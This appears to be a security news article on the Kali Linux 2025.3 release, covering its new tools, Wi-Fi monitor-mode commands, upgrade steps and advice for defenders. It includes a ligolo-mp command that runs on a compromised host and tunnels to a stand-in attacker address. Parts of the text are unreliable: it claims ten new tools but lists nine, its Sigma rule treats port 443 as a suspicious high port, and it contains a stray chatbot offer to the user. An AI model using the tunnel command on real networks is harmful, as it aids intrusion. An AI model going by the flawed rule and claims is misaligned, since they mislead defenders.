Kali Linux 2025.3 Released With 10 New Tools and Advanced Wi-Fi Features

Ten New Tools Expand Red Team Arsenal

Offensive Security has officially rolled out Kali Linux 2025.3, the third release of the year, introducing ten new tools, Nexmon Wi-Fi enhancements, and major NetHunter upgrades. The new release further strengthens Kali’s position as the go-to distribution for red teamers, penetration testers, and SOC analysts.

Among the highlights of this release are new auditing frameworks like Caido and Caido-cli, the Detect It Easy (DiE) binary analysis tool, and offensive Kerberos utilities like krbrelayx.

“Now Nexmon support is back as well as supporting Raspberry Pi 5! Other devices can also use Nexmon, it’s not limited to Raspberry Pis,” the Kali Linux team announced.

Here’s the full list of the ten new tools shipped in Kali 2025.3:

• Caido / Caido-cli – GUI + server for web security auditing
• Detect It Easy (DiE) – File type identification
• Gemini CLI – AI-powered terminal agent
• krbrelayx – Kerberos relaying & unconstrained delegation abuse
• ligolo-mp – Multiplayer pivoting solution for red teams
• llm-tools-nmap – Nmap automation through LLMs
• mcp-kali-server – AI agent connector for Kali
• patchleaks – Patch diffing & exploitability analysis
• vwifi-dkms – Virtual Wi-Fi driver for dummy AP testing

Deep Technical Improvements for Security Practitioners

This release is not just cosmetic — it delivers practical improvements for hands-on researchers. Nexmon firmware patching now ships by default, allowing security pros to enable monitor mode and frame injection on Broadcom/Cypress Wi-Fi chips:

# Enable monitor mode with Nexmon
sudo nexutil -m1
sudo ifconfig wlan0 up
sudo iwconfig wlan0 mode monitor

This enables Raspberry Pi 5 users and others to capture raw 802.11 frames for Wi-Fi audits, WIDS/WIPS testing, and rogue AP detection exercises.

The ligolo-mp pivoting solution allows red teams to establish tunnels into segmented networks with minimal friction:

# Start ligolo-mp relay on the attack box
ligolo relay -laddr :443

# Connect from a compromised host
ligolo agent -connect attacker-ip:443 -ignore-cert

For SOC defenders, this means lateral movement detection should include TLS tunnels over non-standard ports, which can be flagged using a simple Sigma rule:

title: Suspicious TLS Tunnels on High Ports
logsource:
  category: network_traffic
detection:
  selection:
    dst_port|in: [443, 8443, 9443]
    tls_handshake: true
  condition: selection
level: high

Kali NetHunter — Kali’s mobile penetration testing platform — has also been upgraded with support for the Samsung S10, new UI enhancements, and CARsenal car-hacking modules for CAN bus testing.

Why This Release Matters for Security Teams

The 2025.3 release continues the trend of making Kali Linux more versatile for offensive and defensive cybersecurity operations. For enterprises, these improvements highlight the growing sophistication of attack simulations — particularly with tools like patchleaks, which can be used to weaponize fresh security fixes.

Blue teams are advised to:

• Run internal patch diffing on critical software updates to identify potential exploit windows before attackers do.
• Hunt for anomalous Wi-Fi activity — Nexmon-enabled adversaries can spoof APs, capture handshakes, and perform evil-twin attacks.
• Enable network segmentation monitoring to catch ligolo or reverse tunnel behavior early.

These steps align with guidance from MITRE ATT&CK T1557 (Adversary-in-the-Middle) and T1071.001 (Application Layer Protocol: Web Protocols) to detect and block malicious traffic.

For individuals and red teamers, upgrading is straightforward. Offensive Security recommends running:

echo "deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware" | sudo tee /etc/apt/sources.list

sudo apt update && sudo apt -y full-upgrade
cp -vrbi /etc/skel/. ~/
[ -f /var/run/reboot-required ] && sudo reboot -f

You can confirm the update by running:

grep VERSION /etc/os-release

For WSL users, upgrading to WSL2 is recommended to unlock GPU support and graphical app compatibility.

You can view the complete changelog on the Kali Linux release page.

Would you like me to make every future rewrite this technically deep — with real-world code examples, detection guidance, and actionable steps for defenders and red teamers? That would set your coverage apart from 99% of other cybersecurity news sites.

What this means technically

• Offensive testing becomes easier and faster. Built-in Nexmon and packaged wireless tooling reduce time-to-test for monitor-mode and injection tasks.
• New pivoting and Kerberos tools increase lateral-movement capabilities during red-team exercises; defenders must expect more realistic use of these techniques in assessments.
• AI-assisted discovery (through llm-tools-nmap and agent connectors) accelerates reconnaissance but also raises risks if misused by low-skill actors to automate noisy scan-and-exploit pipelines.

Risk Implications for Defenders and Enterprise Security Teams

The democratization of wireless firmware patches and collaboration-oriented pivoting tools increases the attack surface in two ways: threat actors can execute advanced Wi-Fi attacks with less setup time, and novice actors can operationalize multi-step intrusion flows via LLM-assisted scanners and ready-made pivot frameworks. Defensive teams should treat this release as a signal to harden detection and containment for commonly abused techniques:

• Monitor for new wireless adapters and unexpected monitor-mode activity on corporate endpoints.
• Alert on unusual Kerberos-related relay patterns, suspicious use of delegated authentication flows, and mass-export behavior from internal admin consoles.
• Assume that tools packaged in Kali will quickly appear in commodity attacker toolkits—update signatures, detection logic and playbooks accordingly.

Comparative Context — Trends Across Security Distros and Toolchains

Kali’s steady cadence mirrors a broader tooling trend: major pentest distributions are increasingly shipping integrated firmware support, AI/agent connectors, and collaborative pivoting solutions. Other projects and releases earlier in 2025 have pushed container-friendly builds and improved ARM/embedded support—indicating the red-blue arms race now includes embedded and AI-assisted vectors, not only classic vulnerability exploitation.

Remediation and Detection Guidance — Practical Steps for Security Teams

1. Harden wireless posture: Inventory authorized wireless interfaces, enforce 802.1X on corporate Wi-Fi, and block unknown USB network adapters via endpoint controls.
2. Monitor Kerberos telemetry: Implement detections for unusual SPN lookups, constrained/unconstrained delegation artifacts, and repeated relay attempts.
3. Detect pivot frameworks: Look for persistent reverse tunnels, multi-peer TUN devices, and new long-running userland processes (ligolo-mp-style behavior).
4. Update threat intel & signatures: Add indicators and behavior patterns from new tools (krbrelayx, patchleaks, llm-tools-nmap) to SIEM and EDR rule sets.
5. Segment test and production: Isolate red-team and wireless labs from production networks, enforce strict egress and VLAN policies, and require signed images for lab devices.
6. Train SOCs on AI-assisted reconnaissance: Run detection exercises that simulate automated scanning/chain workflows created by LLM-enabled tools.

Security teams should recognize that packaging powerful capabilities (firmware patches, Kerberos relays, multi-peer pivoting and LLM connectors) into mainstream distributions reduces the operational friction for both legitimate testers and malicious actors. Defenders win by shifting from signature-only detection to behavior-based telemetry, egress control and robust vendor/hardware inventory.